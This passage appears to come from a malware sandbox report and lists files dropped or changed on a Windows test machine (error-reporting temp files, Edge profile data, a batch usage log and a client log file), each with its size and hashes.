                                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.72c75bd7-6927-424e-8c53-f053d7cff7c3.tmp.csv
                                                                                                                                                                            Filesize

                                                                                                                                                                            36KB

                                                                                                                                                                            MD5

                                                                                                                                                                            2107e07fe1c70a894eab9bbe4540fc65

                                                                                                                                                                            SHA1

                                                                                                                                                                            90ad032cf995b97fe6d4a1a1ea3d54aabf7767c3

                                                                                                                                                                            SHA256

                                                                                                                                                                            0ae3a7fcb5914b55cd13218d0dc0056ad4ebbd40ad2bb545e7c7e915171e119f

                                                                                                                                                                            SHA512

                                                                                                                                                                            4d11b6dd2a6580eb070362702637781b25a208cc563670866958710c3eb580c4d742b62e2569c8671fef073b0d58b16eeca7e16cda8baca6f3369571769e3e21

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.7f5539ef-467c-4c8c-b66e-c5a780ec0e48.tmp.txt
                                                                                                                                                                            Filesize

                                                                                                                                                                            13KB

                                                                                                                                                                            MD5

                                                                                                                                                                            8b3aa41fff11909378561a3569cd6468

                                                                                                                                                                            SHA1

                                                                                                                                                                            83fcbcb3657ece23796a532fecf29e58305a8025

                                                                                                                                                                            SHA256

                                                                                                                                                                            f1134c8d5379b94b049b47f58fc3150d0e9c7eaca498cfa473d1c3c06edef048

                                                                                                                                                                            SHA512

                                                                                                                                                                            e1fd662d0a2206082a686bbb50ecf16549c1964907ecb5fc5588c1c20ef536ac4cca65271dc60cf4cb47beb403366c565eea04357052fbe3ef6924b2947c3341

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
                                                                                                                                                                            Filesize

                                                                                                                                                                            404B

                                                                                                                                                                            MD5

                                                                                                                                                                            380ddc536b0c32874e44f7eee26636c9

                                                                                                                                                                            SHA1

                                                                                                                                                                            717f873ca3897f62b75122c1c1ae6232fb2b3a52

                                                                                                                                                                            SHA256

                                                                                                                                                                            01d53498c4ad34c48f0d62d5959764d17074baf98de9aa1425f7df215ea8585b

                                                                                                                                                                            SHA512

                                                                                                                                                                            bd5c01f67d1af0551b9c52c9360103e9ba461af416a6b05b54bfc7e6717dd77ac9cc81de7ca7fbe0678a1d2c2aae867949ae7f0d667794ae9de90c057315359b

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Uni.bat.log
                                                                                                                                                                            Filesize

                                                                                                                                                                            1KB

                                                                                                                                                                            MD5

                                                                                                                                                                            0d57fc33826cdd8ab7f1fd188829748d

                                                                                                                                                                            SHA1

                                                                                                                                                                            40fab51cd74493d07e0c37af6bfee896e9d0cef6

                                                                                                                                                                            SHA256

                                                                                                                                                                            4ff6a3eca1a0964fa036fcc54b2fa2137de9ade61e8140cee7e3136352445c41

                                                                                                                                                                            SHA512

                                                                                                                                                                            dd02119b787943e580156d89ea75ad38eff863bf560d4ec33fa4e52202f0b6252e928322f73e3a3e11685fb0cff204af4d67c6818bdf9812d7b458c362965aaa

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                            Filesize

                                                                                                                                                                            152B

                                                                                                                                                                            MD5

                                                                                                                                                                            34d22039bc7833a3a27231b8eb834f70

                                                                                                                                                                            SHA1

                                                                                                                                                                            79c4290a2894b0e973d3c4b297fad74ef45607bb

                                                                                                                                                                            SHA256

                                                                                                                                                                            402defe561006133623c2a4791b2baf90b92d5708151c2bcac6d02d2771cd3d6

                                                                                                                                                                            SHA512

                                                                                                                                                                            c69ee22d8c52a61e59969aa757d58ab4f32492854fc7116975efc7c6174f5d998cc236bbf15bce330d81e39a026b18e29683b6d69c93d21fea6d14e21460a0a7

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                            Filesize

                                                                                                                                                                            152B

                                                                                                                                                                            MD5

                                                                                                                                                                            046d49efac191159051a8b2dea884f79

                                                                                                                                                                            SHA1

                                                                                                                                                                            d0cf8dc3bc6a23bf2395940cefcaad1565234a3a

                                                                                                                                                                            SHA256

                                                                                                                                                                            00dfb1705076450a45319666801a3a7032fc672675343434cb3d68baccb8e1f7

                                                                                                                                                                            SHA512

                                                                                                                                                                            46961e0f0e4d7f82b4417e4aac4434e86f2130e92b492b53a194255bd3bba0855069524cd645f910754d4d2dbf3f1dc467bcc997f01dc6b1d8d6028e2d957236

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                            Filesize

                                                                                                                                                                            152B

                                                                                                                                                                            MD5

                                                                                                                                                                            9f30963bea77353bd744f90166c4ffaa

                                                                                                                                                                            SHA1

                                                                                                                                                                            bc7b33f3d3915462e3c865e47ae1915096d997ce

                                                                                                                                                                            SHA256

                                                                                                                                                                            2c2cb5c0f35b6968da8a594d7234cfe42969328a17fbcfa7240da514cb2ddc82

                                                                                                                                                                            SHA512

                                                                                                                                                                            206df5985f5b0b8e75e753962facc06c1098cb218cfd93edf9a98632c7417abdb4525d0c7be7c232579c1fcca78049e6fcaf61125e3bc182bfdb53dff8d452a0

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                                                                                            Filesize

                                                                                                                                                                            152B

                                                                                                                                                                            MD5

                                                                                                                                                                            0feba345f2fa3faa3f0e50acc8986490

                                                                                                                                                                            SHA1

                                                                                                                                                                            4a765f9cdb65717cf9722d0527eed54b137d26f1

                                                                                                                                                                            SHA256

                                                                                                                                                                            a6167f21c59c41df4bcb0027b716b97b84c91a0d94e5168ad1ed998d11cafdef

                                                                                                                                                                            SHA512

                                                                                                                                                                            3319cf0711f6758eb316be835cdeab63b31992e97dfa581ef9c3a42114a8df61947f1f449ab77e3b2c7d5104e76d0e6c538deda780e0a73b985c79fe17950237

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
                                                                                                                                                                            Filesize

                                                                                                                                                                            44KB

                                                                                                                                                                            MD5

                                                                                                                                                                            d1f604157b0745a40453afb93a6caa42

                                                                                                                                                                            SHA1

                                                                                                                                                                            3d5d77429b03674ebb0ba34d925ba1b09310df5e

                                                                                                                                                                            SHA256

                                                                                                                                                                            468456974fd86b33647942820dce7284879acfab9e9e6eca008e1fdcf9006fb5

                                                                                                                                                                            SHA512

                                                                                                                                                                            0644ce93724a57dedd8aec208e5a038e323a1b9871d5046d58a87c60479626693e6c8f25b7c7f7b60fd35aac133d2e660ecbd8f8d579ad1fc6703ae117a485a0

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
                                                                                                                                                                            Filesize

                                                                                                                                                                            264KB

                                                                                                                                                                            MD5

                                                                                                                                                                            8b87fb74735cde02c0ff3217b735c882

                                                                                                                                                                            SHA1

                                                                                                                                                                            26fce478f6b1de0bbdf32fa69f5d53421330d09d

                                                                                                                                                                            SHA256

                                                                                                                                                                            e0f4b4e455e316d2f5b153171c0d016f7704e2f7bddd5592717caa6d23426dc5

                                                                                                                                                                            SHA512

                                                                                                                                                                            11b71ebe053f5cfd69652009dfc2f84a5d577c06992646a30740f3fe7a178e393d7d5f22f840cb57139a4691d16507567be717f4bc1434639e948f836f095558

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
                                                                                                                                                                            Filesize

                                                                                                                                                                            264KB

                                                                                                                                                                            MD5

                                                                                                                                                                            1fffc9ba9821639ae38e761000458fd8

                                                                                                                                                                            SHA1

                                                                                                                                                                            fa6829a6393b173a27d29d2dd68e1938afdfd2c8

                                                                                                                                                                            SHA256

                                                                                                                                                                            a174e1a10171ecfdef406ed99ebad46ec4ccb3025c6ef6b77348f6492da2e5a9

                                                                                                                                                                            SHA512

                                                                                                                                                                            49c15fa6ef7f6bc6f96b74fa6f07217df4fcd9f599fa1221bae79c675ff15e7e58392bb5772fce02f69b96855ee1972383dff9d3d75575090fee4a805cbcb070

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
                                                                                                                                                                            Filesize

                                                                                                                                                                            116KB

                                                                                                                                                                            MD5

                                                                                                                                                                            05f4d7c114ef56a604f9a86ef4c42347

                                                                                                                                                                            SHA1

                                                                                                                                                                            e926bc307c04f7cd535ad0e6155f62a4e6fdad4e

                                                                                                                                                                            SHA256

                                                                                                                                                                            0c97b851d092c32f1568fda8344cbe2db0ad50fb76fc7560b087f2d405af116f

                                                                                                                                                                            SHA512

                                                                                                                                                                            b2411b5e4ee6c0adc82c4ca61f2cfe83af9e5b2c8e9f818fdefb3cd61c5b0b4b307043065c644fe375140dc5920758a1519876e40204bd0bc59477b375e444ea

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
                                                                                                                                                                            Filesize

                                                                                                                                                                            6B

                                                                                                                                                                            MD5

                                                                                                                                                                            a9851aa4c3c8af2d1bd8834201b2ba51

                                                                                                                                                                            SHA1

                                                                                                                                                                            fa95986f7ebfac4aab3b261d3ed0a21b142e91fc

                                                                                                                                                                            SHA256

                                                                                                                                                                            e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191

                                                                                                                                                                            SHA512

                                                                                                                                                                            41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
                                                                                                                                                                            Filesize

                                                                                                                                                                            331B

                                                                                                                                                                            MD5

                                                                                                                                                                            6b12131913549c2e49cc4e3503d6b8cc

                                                                                                                                                                            SHA1

                                                                                                                                                                            3693feabb96dd2ed4f6ef0bf993ca2a1c585f709

                                                                                                                                                                            SHA256

                                                                                                                                                                            116c946947ba01e0868a84fe7f2c2fd0278b3b606a63d23d628b4029c3531bfc

                                                                                                                                                                            SHA512

                                                                                                                                                                            8fa7ecb3a9bb67bb3422fe1a1303eb7ebd0ce358b8b8881db2e2df88b660604a0ef4aff7150dcbffe49607e1447f555a397776e542bc6c352e0f0971a536e018

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                            Filesize

                                                                                                                                                                            5KB

                                                                                                                                                                            MD5

                                                                                                                                                                            68161fafb7f89236a457b0e44a58c72c

                                                                                                                                                                            SHA1

                                                                                                                                                                            87caab68d5d855579f37721e8f131f348473f52c

                                                                                                                                                                            SHA256

                                                                                                                                                                            3f557b6b1c2fe5f58266fd25ca5f359c34f38ae2f538650d3a170695326d00a6

                                                                                                                                                                            SHA512

                                                                                                                                                                            7df7aed47b8c14aa84bd5ac232995c9488af38bd68890eb0ee6ea50900bb181761411ddefd5eecad25e6d56d693ffeeb175b194cd0eb050639871ae469399f82

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                            Filesize

                                                                                                                                                                            6KB

                                                                                                                                                                            MD5

                                                                                                                                                                            c7e73ec10f5e7da229e73e6d212c3e3a

                                                                                                                                                                            SHA1

                                                                                                                                                                            f28cd554fc49635aa5ba939fb094c21243297129

                                                                                                                                                                            SHA256

                                                                                                                                                                            34390b67475253fcb0ba47f6d658f977328f9dc12e54b7d815f42a409dca37c5

                                                                                                                                                                            SHA512

                                                                                                                                                                            399b6e659b8bf88047bb9a78478ba9721f204137dd65a0ecfe49147df651e6dbf6263ffe7d6bf34647054ba8bb8e7e1cd8fd533e07529f0cf4ce28f6e0a6f005

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                            Filesize

                                                                                                                                                                            6KB

                                                                                                                                                                            MD5

                                                                                                                                                                            9209960ba943ffce0282cde6f3b6ea18

                                                                                                                                                                            SHA1

                                                                                                                                                                            a8bd10f1703c7655ae7383b33cd17ce7d9151680

                                                                                                                                                                            SHA256

                                                                                                                                                                            8fd4eefc1e58cbf1b24c2f967b5e35f58a4e63cd6cbb1cb16a5175062e1a22de

                                                                                                                                                                            SHA512

                                                                                                                                                                            77feaa1803b866ae1bdc7539e60ebc1d69009e4ceb52c66c4914b44f072ff40683fe836b219587b8a5e4f8fe1225b16b0a2287e8b76a9fa49528bb3aab0a1c86

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                            Filesize

                                                                                                                                                                            6KB

                                                                                                                                                                            MD5

                                                                                                                                                                            a609874e9834a0d5c5f41dc93385247c

                                                                                                                                                                            SHA1

                                                                                                                                                                            1b064c7585d36dbde56b550a0798dd84b37cd0ac

                                                                                                                                                                            SHA256

                                                                                                                                                                            2cd9046a5831cebb920fa86f9a1ccc21f223e948a8fb2d91f0a6c61783ac781b

                                                                                                                                                                            SHA512

                                                                                                                                                                            560a4489bd4eaf8fb509864382365153d665cc49d8300e12a8a7fc6dda2b893348bc8f4c98d5046ea373535685ebd059c5320a2d1d0c17b1dae779a24a390f28

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                                                                                            Filesize

                                                                                                                                                                            6KB

                                                                                                                                                                            MD5

                                                                                                                                                                            be5b8c48babb057a829c64a6ee644f46

                                                                                                                                                                            SHA1

                                                                                                                                                                            3646948e35e6cf3799a44712133de565b2647443

                                                                                                                                                                            SHA256

                                                                                                                                                                            a1a204634fd3ad9d8958464abf0d2be5425bf1d4ce85b51b05c44907819f1d06

                                                                                                                                                                            SHA512

                                                                                                                                                                            63687410873b648a4ccdcb7189b270b6e6e8eaad4032711f4a1a1063c21e09ab9cebbf38e0e333f9fed0ae1db3a438c09dcfa612b104ebbe71b0fc5063a1384f

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
                                                                                                                                                                            Filesize

                                                                                                                                                                            346B

                                                                                                                                                                            MD5

                                                                                                                                                                            99eb4f3410780d4f7c9f432f5cc23f74

                                                                                                                                                                            SHA1

                                                                                                                                                                            186c87877609c9f2b5f44bbc3f9eece2e096f842

                                                                                                                                                                            SHA256

                                                                                                                                                                            f6644a9bb1515338c075e4566e5a4862e68cec526012120ab1269a36c1f2855a

                                                                                                                                                                            SHA512

                                                                                                                                                                            986ed64fa359668606a5e6b7528d9244cd0093097a8f8b701a8108de20d7f7cb09befcbb5653cfe1a0c32813020b5646a278cab9e4d5de2f2e40dd2492037c3f

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
                                                                                                                                                                            Filesize

                                                                                                                                                                            319B

                                                                                                                                                                            MD5

                                                                                                                                                                            721b214fbeab7e4c9c62ffe827ace068

                                                                                                                                                                            SHA1

                                                                                                                                                                            142a55a50e3279439a38432052191029854f8947

                                                                                                                                                                            SHA256

                                                                                                                                                                            73f086fbe4060eb3d1785514126c838bec184fb954a82d1dcb5b8588996543cc

                                                                                                                                                                            SHA512

                                                                                                                                                                            9a91a5614da4db2ff1f6144c2d032ab6f408806bc17ad6fb54c920afe2bc552f3deff80e9927d5172d9332a5f5ff2d3a843b7d3ab531eba7130c502c5c400855

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13359418254898967
                                                                                                                                                                            Filesize

                                                                                                                                                                            1KB

                                                                                                                                                                            MD5

                                                                                                                                                                            a74f5a3bf6bc583a692ef915de59744e

                                                                                                                                                                            SHA1

                                                                                                                                                                            0767929d329fb7e21f329aa2a6ec5c5f26dfb7e7

                                                                                                                                                                            SHA256

                                                                                                                                                                            9141ba2564e27e6338c0db981ba787332cc41fd961b56644ae886ba72dbc1741

                                                                                                                                                                            SHA512

                                                                                                                                                                            16b6ab358aec95c01e2befe9b65788d6513d6a03f8cdb2bcbffd281be63cf27ce1a1058a26bbfa1a88566a76358950ce29f806d5b989ec9a87372e47b7e7cad7

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
                                                                                                                                                                            Filesize

                                                                                                                                                                            350B

                                                                                                                                                                            MD5

                                                                                                                                                                            eb8c3034b644f4d98395dbecff28538b

                                                                                                                                                                            SHA1

                                                                                                                                                                            90c473ab31be49204804747e0900aac7e9fb559a

                                                                                                                                                                            SHA256

                                                                                                                                                                            dfb0418102c43813c5b998de0d23010e27c47099d1d928a94b952406883c6a92

                                                                                                                                                                            SHA512

                                                                                                                                                                            f4071fd762690db90db501bd8b9972cae79f01b7887f4ac44245fcf85dc367c27d1b51f3a60060a713e17d4f2f488cae843b790206ae7d63c3209260c58a41a2

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
                                                                                                                                                                            Filesize

                                                                                                                                                                            323B

                                                                                                                                                                            MD5

                                                                                                                                                                            f21c21c495a231908f75772b0e54c0e4

                                                                                                                                                                            SHA1

                                                                                                                                                                            18bc519a201898d0d143e2ab39d31bfd5daedebd

                                                                                                                                                                            SHA256

                                                                                                                                                                            508d16b30fa614636edc29db7738e4291621ce34c9f2c5a189976f3b8e01a734

                                                                                                                                                                            SHA512

                                                                                                                                                                            eebe1287c721821cd22c6cf7d575d7cc37469267001ef33e70722898addca35a85fc5010fe99d3f9d65097cd8c60966bcd6b212e419ba029184482448473ceac

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                                                                                                                            Filesize

                                                                                                                                                                            16B

                                                                                                                                                                            MD5

                                                                                                                                                                            206702161f94c5cd39fadd03f4014d98

                                                                                                                                                                            SHA1

                                                                                                                                                                            bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                                                                                            SHA256

                                                                                                                                                                            1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                                                                                            SHA512

                                                                                                                                                                            0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                                                                                                                            Filesize

                                                                                                                                                                            16B

                                                                                                                                                                            MD5

                                                                                                                                                                            46295cac801e5d4857d09837238a6394

                                                                                                                                                                            SHA1

                                                                                                                                                                            44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                            SHA256

                                                                                                                                                                            0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                            SHA512

                                                                                                                                                                            8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db
                                                                                                                                                                            Filesize

                                                                                                                                                                            44KB

                                                                                                                                                                            MD5

                                                                                                                                                                            b7d59d15a3f9d168acf7cdc8ecf124e1

                                                                                                                                                                            SHA1

                                                                                                                                                                            c7c554a6d83d434d29fc869ffb2239ba3b9cf940

                                                                                                                                                                            SHA256

                                                                                                                                                                            d3817a8c16325f5e44948bfad03561fb1653c4f7d2ee22d9f68af33d9c3aab60

                                                                                                                                                                            SHA512

                                                                                                                                                                            1e4e9abd2a506e845bc1fa9cc9bcae3c8581cd88344e4993da88bd9ae222faaa4d1419cb1d04a3ab99d85d25598e6e94064e9319fc7fcfc6f0f25a75fef5d0d5

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log
                                                                                                                                                                            Filesize

                                                                                                                                                                            76B

                                                                                                                                                                            MD5

                                                                                                                                                                            cc4a8cff19abf3dd35d63cff1503aa5f

                                                                                                                                                                            SHA1

                                                                                                                                                                            52af41b0d9c78afcc8e308db846c2b52a636be38

                                                                                                                                                                            SHA256

                                                                                                                                                                            cc5dacf370f324b77b50dddf5d995fd3c7b7a587cb2f55ac9f24c929d0cd531a

                                                                                                                                                                            SHA512

                                                                                                                                                                            0e9559cda992aa2174a7465745884f73b96755008384d21a0685941acf099c89c8203b13551de72a87b8e23cdaae3fa513bc700b38e1bf3b9026955d97920320

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
                                                                                                                                                                            Filesize

                                                                                                                                                                            319B

                                                                                                                                                                            MD5

                                                                                                                                                                            4c42b72e4b056bf49066136d18a97a86

                                                                                                                                                                            SHA1

                                                                                                                                                                            15eaee7b7ba68f30bea452cb26b94658c96031cd

                                                                                                                                                                            SHA256

                                                                                                                                                                            fbbc7e65964de60b9747011f9fc09dfff3706731a869938087a6334f8051e931

                                                                                                                                                                            SHA512

                                                                                                                                                                            b0bcb2c1b64a2f4f460f5ab7be2411edf245b1d525c71b35dc8fe642d8ecd5357192623bb59d0a187354f6195c1a2d66271d6b707cd7bd9248250186dc6cd46f

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
                                                                                                                                                                            Filesize

                                                                                                                                                                            318B

                                                                                                                                                                            MD5

                                                                                                                                                                            a5037f28192c103058f925ebff26e7ce

                                                                                                                                                                            SHA1

                                                                                                                                                                            77ef038493954129065647478bd71a4a903c1e34

                                                                                                                                                                            SHA256

                                                                                                                                                                            8433011cc64278d1938c71a3403f73f2242c71ec93965651bb89e4bdbf58f5a2

                                                                                                                                                                            SHA512

                                                                                                                                                                            32c32a60612a525e9e647132c948d81d7f0193f822f995816149128a9cdb1f228885771953fe237c8c790e71b35ad2ee91ad03ff63fd582e814902aab24790be

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
                                                                                                                                                                            Filesize

                                                                                                                                                                            337B

                                                                                                                                                                            MD5

                                                                                                                                                                            4988d28508b2fb4889c410e18dc9981d

                                                                                                                                                                            SHA1

                                                                                                                                                                            31b3b1c1da61fb026b29e5f1e75b2233892410e1

                                                                                                                                                                            SHA256

                                                                                                                                                                            89b55f541f9018a70fb939f7b1ae153f07946179616bcb3e1dc4612d1fb6bd9a

                                                                                                                                                                            SHA512

                                                                                                                                                                            fdbca874c7ca7b2f7d05d285bfcf8adb34ba29876a7abbbc32efaebb2f6a833615ae3f10818ca4eecad7fe9da6ec09e04ebf52074beaba76b368e71021b898df

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
                                                                                                                                                                            Filesize

                                                                                                                                                                            11B

                                                                                                                                                                            MD5

                                                                                                                                                                            b29bcf9cd0e55f93000b4bb265a9810b

                                                                                                                                                                            SHA1

                                                                                                                                                                            e662b8c98bd5eced29495dbe2a8f1930e3f714b8

                                                                                                                                                                            SHA256

                                                                                                                                                                            f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4

                                                                                                                                                                            SHA512

                                                                                                                                                                            e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                                            Filesize

                                                                                                                                                                            11KB

                                                                                                                                                                            MD5

                                                                                                                                                                            130b64cd142f43aedca9095fbc65ea98

                                                                                                                                                                            SHA1

                                                                                                                                                                            eb4f5be71c994c233bec169914cadc389de45453

                                                                                                                                                                            SHA256

                                                                                                                                                                            e165466d0b8b2391ca46a1f7f90b0e1f12da54628806102815adb16e668ecd24

                                                                                                                                                                            SHA512

                                                                                                                                                                            0a3aaff5657260482ea9e01d4f72ba1ba5c317cc6f8dc199862635e104e790a69170cf1b1823fa523d84cc9922feba05ae963dcc63f8d8c40180b5feba2dc894

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                                            Filesize

                                                                                                                                                                            11KB

                                                                                                                                                                            MD5

                                                                                                                                                                            92ec3e8c726e7104286384fe385bc8c2

                                                                                                                                                                            SHA1

                                                                                                                                                                            78a289bf427e893b7929128c6213e096f7b09f3f

                                                                                                                                                                            SHA256

                                                                                                                                                                            e3922c0ba8a135e697c3317da89e96b0dcba22d3a134c26eb38bd8b630eff17a

                                                                                                                                                                            SHA512

                                                                                                                                                                            a2992a82b515c1b1957efda175ca13c2f272235cb5d9b5fd9434b32412a13864b292f6fe61486d875bb66ed534df93812504b5bbf54232b423bd9ac1726ad97c

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                                                                                            Filesize

                                                                                                                                                                            12KB

                                                                                                                                                                            MD5

                                                                                                                                                                            f52cb13be59fd624e48269044e91e53f

                                                                                                                                                                            SHA1

                                                                                                                                                                            51ae49fb5e38d959d9722566e5637c10b62f3b13

                                                                                                                                                                            SHA256

                                                                                                                                                                            18f070b0ee89105024a024332023a51bd43cb088be9365ed1ffb1f6f7e0a12db

                                                                                                                                                                            SHA512

                                                                                                                                                                            9a8bdc165fbd020fb780471037b5388694f3fefae05f5e15f4df128b18f4f8f3c301ffc24cd6108a954833f55250d749d5ecd4933e1f0f7e938877598ce6d48e

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
                                                                                                                                                                            Filesize

                                                                                                                                                                            264KB

                                                                                                                                                                            MD5

                                                                                                                                                                            97b81d40dc942905b752262e80912a0f

                                                                                                                                                                            SHA1

                                                                                                                                                                            25b47925941131a7822baf723cce6764f33231fd

                                                                                                                                                                            SHA256

                                                                                                                                                                            112edebb23b5dfc2d6b58270e486d665b47ff2bf27ef349cf0c7f178f4a4c4c2

                                                                                                                                                                            SHA512

                                                                                                                                                                            1d1f8aa587eedebe60ef628e81618760d2c84827a073d315178ea30c50c28cb73773c097b7c578f88366183abd9334fc842ac1c7a3b4110815d7c8177eda7ea1

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
                                                                                                                                                                            Filesize

                                                                                                                                                                            14KB

                                                                                                                                                                            MD5

                                                                                                                                                                            a308480a96d1b4481952675bff4fd8a7

                                                                                                                                                                            SHA1

                                                                                                                                                                            b924da70f29e383a56086bf2d0ba6930bc3e9c92

                                                                                                                                                                            SHA256

                                                                                                                                                                            1385acd0b2226b58698ee81dd055e0cb723de8f9fe8d6fce070b5da99d23d51f

                                                                                                                                                                            SHA512

                                                                                                                                                                            58e7a093087ce52e9d7c31fe7bfa7660f53ddabf2a6f30665812027c6b03eb8e9b114f435511b5e601da882697c899087b6670e8457d01465d802aa2201b4597

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
                                                                                                                                                                            Filesize

                                                                                                                                                                            10KB

                                                                                                                                                                            MD5

                                                                                                                                                                            6e2dd918b2c22ec9d38424b34577d88b

                                                                                                                                                                            SHA1

                                                                                                                                                                            ce9b5ec7934ace13a02d64f494ec8cf6de8ce5c9

                                                                                                                                                                            SHA256

                                                                                                                                                                            037e7f2cd9d518cafd37f55edee61feac13b4dfdd35f67b41d7af525d93b7f0f

                                                                                                                                                                            SHA512

                                                                                                                                                                            fe292b07ea0f7db690e00640f29b5cf7de32ddcdc887c24075801e1b7ad756e94dab31e297efff6c9def49ec3ac20e22c71ba40afb7e4fb75bf0678b64328eca

                                                                                                                                                                            Download Submit
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Clients\Admin@DWCXZJLH_872C1E3\Logs\05-05-2024.html
                                                                                                                                                                            Filesize

                                                                                                                                                                            161B

                                                                                                                                                                            MD5

                                                                                                                                                                            1ff9f93436449874bc66c7650d9983c5

                                                                                                                                                                            SHA1

                                                                                                                                                                            9e8f3602180427f338f0b6ddeae39c6e53570b88

                                                                                                                                                                            SHA256

